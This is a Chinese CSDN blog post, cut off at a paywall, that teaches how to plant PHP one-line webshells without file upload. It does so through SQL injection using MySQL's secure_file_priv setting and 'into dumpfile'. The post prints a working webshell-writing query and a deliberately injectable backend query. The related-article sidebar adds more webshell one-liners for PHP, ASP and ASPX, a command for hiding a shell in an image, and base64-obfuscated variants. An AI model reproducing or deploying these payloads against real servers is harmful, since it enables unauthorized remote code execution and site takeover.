除了文件上传还有哪些方式可以写一句话木马?

最新推荐文章于 2024-04-23 21:30:00 发布
最新推荐文章于 2024-04-23 21:30:00 发布
阅读量2.2k 收藏 12
点赞数 3
分类专栏: 知识总结 文章标签: nginx 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51553814/article/details/121613100
版权

除了文件上传还有哪些方式可以写一句话木马?

一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习)

这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好

结合sql注入生成一句话木马

讲这之前得先介绍mysql配置文件中的secure_file_priv选项

secure_file_priv配置

  • secure_file_priv为null 表示不允许导入导出 (5.7后为默认值)
  • secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
  • secure_file_priv没有设置时,则表示没有任何限制

配置文件的位置:

在windos下

mysql.ini的[mysqld]下添加

在linux下

/etc/my.cnf的[mysqld]下添加

也就是说,这个配置一旦打开,我们就能够通过sql语句来实现生成文件功能了

接下来就是重点介绍生成文件的两个mysql语法了

into dumpfile

这个语法的作用就是用于自定义写shell文件
例如:

select "<?php eval($_POST[shell]);?>" into dumpfile 'D:\\phpStudy\\PHPTutorial\\WWW\\html\\one\\shell.php'

into dumpfile后面只能跟绝对路径。

这里我准备了一个实例给大家

在这里插入图片描述

这就是一个简单的整型注入。主要是用于演示,所以就没有进行任何过滤。

在他后端的代码则是

select Name from name where Id = $_GET['id']
最低0.47元/天 解锁文章
火火火与霍霍
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马图片制作
Kyl2n的博客
11-05 2176
常见一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 使用工具: 一台能使用cmd命令的电脑 步骤1: 在记事本中加入一句话木马,保存。如:a.txt 准备一张图片(文件大小
PHP一句话木马攻防
浪子四方
01-17 3124
引言 在网络世界,信息唾手可得,很难保证信息的绝对安全,只要公网可以访问,那么总会存在那么点漏洞让非法入侵者有机可乘,所以作为开发者或网络管理人员,我们要定时查看日志,备份站点数据,做好安全防范攻略。此笔记记录笔者对PHP配置的安全建议,有更好的方法也希望小伙伴们能够告知我一下,互相学习互相进步,构建安全站点。 PHP小马 方式1:system() <?php $cmd = $_...
深入探究网络安全:JDBC反序列化漏洞与远程代码执行(RCE)
白帽黑客佳哥的博客
04-23 821
Java开发环境:安装Java SDK以运行和编译JDBC相关代码。MySQL数据库服务器:用于正常的数据库操作,同时用于攻击演示的Fake MySQL Server。网络抓包工具:如Wireshark,用于捕获和分析MySQL协议数据包。
创建一句话木马(图片马)
weixin_45571987的博客
04-04 1066
图片一句话木马的编使用cmd命令行创建图片一句话木马 使用cmd命令行创建图片一句话木马 copy 1.jpg/b+1.php/a 5.jpg 这边图片木马就成功创建了
图片一句话木马简单制作方法
热门推荐
TimeOldman的博客
12-01 5万+
小白对于制作一句话木马的心得,也是给自己留个印象。
如何制作图片一句话木马
qq_52676257的博客
03-09 2950
如何制作图片一句话木马 新建一个文件夹,在其中放入一张图片(图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如: 其中的一句话木马为 <?php @eval($_POST["value"]);?> 再入一个cmd的bat文件 然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg 这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。 ...
PHP一句话木马小结与SQL语句一句话木马
09-11 291
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_dec...
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
一句话木马的入侵过程可以分为四步:首先登录网站后台,找到文件上传点,通过搜索“dedecms上传文件”即可获取文件上传的入口;其次,上传已准备好的PHP一句话木马文件;第三,访问该文件的路径,查看是否可以访问;...
asp防止上传图片木马原理解析
10-23
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
一句话批量检测工具
06-22
通过该工具,用户可以一键式检查大量文件,识别其中是否存在可能的一句话木马或非法注入,从而提高安全防护能力。 【描述】"一句话批量检测工具" 的核心功能在于其高效的扫描算法,能够对多个文件进行深度分析,...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
最简单的一句话木马包括ASP、ASP.NET和PHP环境下的版本。为了绕过Web应用防火墙(WAF)的检测,木马通常需要变形,例如替换关键词、加密或使用无用函数来构造关键词。 **6.1.2 小马变形** 小马的变形是为了逃避WAF...
有效防止ASP木马上传运行—小知识[网络安全技术]
01-02
一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一、使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将...
一句话木马
qq_43814486的博客
04-22 2361
条件:1.有服务器入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。 例如:在服务器的地址里创建一个叫virus.php文件里边放代码: <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了,例如访问: http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...
一句话木马该怎么实现?现在就带你了解
m0_59598029的博客
02-23 868
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。
webshell 一句话木马
无痕的博客
01-12 3415
一句话木马
Web安全-一句话木马
jennycisp的博客
12-25 2606
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
(2020上半年第8天)小迪网络安全笔记(问题①)如何突破MYSQL的secure_file_priv防护
u013630181的博客
06-20 595
文件读注入需要考虑mysql版本问题,高版本存在secure_file_priv过滤,高版本突破,低版本直接入 数据库如果是高版本,数据库会有防御,解决方法两种,硬钢或者绕过, 硬钢参考:https://www.cnblogs.com/c1e4r/articles/8902444.html 我是用硬刚的方法,下面是我硬钢的过程: 出现这样的问题: 在处理sqlilabs第七关, 入url:http:\\127.0.0.1\sqlilabs\Less-7\?id=1’)) union select nu
调用system函数输出变量到对应的文件下
xiang577307795的博客
08-24 3802
1、在脚本文件中,有echo "hello world"  &gt;&gt; /var/hello.log 此时就会 把字符串 hello Word 追加到/var/ 文件目录下的hello.log中,无论hello.log是否存在。 2、如果在c语言中,往一个文件里输入变量。此时不用打开文件进行操作,只需调用函数system()进行操作。 如: system(" echo hello1 &...
文件操作安全之-文件上传流量告警运营分析篇
村中少年的专栏
05-15 1426
文件上传的定义,文件上传的IDS规则,文件上传的告警研判,文件上传的处置建议等开展日常安全运营工作,挖掘有意义的安全事件。
一个文件上传漏洞一句话木马
最新发布
06-19
我不能提供关于创建或利用文件上传漏洞的任何指导,因为这种行为违反了网络安全规定和道德准则,可能导致未经授权的数据访问或系统破坏。安全专家强烈建议避免此类活动,而应该专注于学习并使用技术来保护系统免受攻击。 如果你对网络安全感兴趣,可以探索如何修补这些漏洞(如使用验证、过滤和输入 sanitization 等防御措施),或者学习如何防范和响应这类攻击。对于合法的安全研究,通常需要在受控的环境中,并遵守相关的法律和政策。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值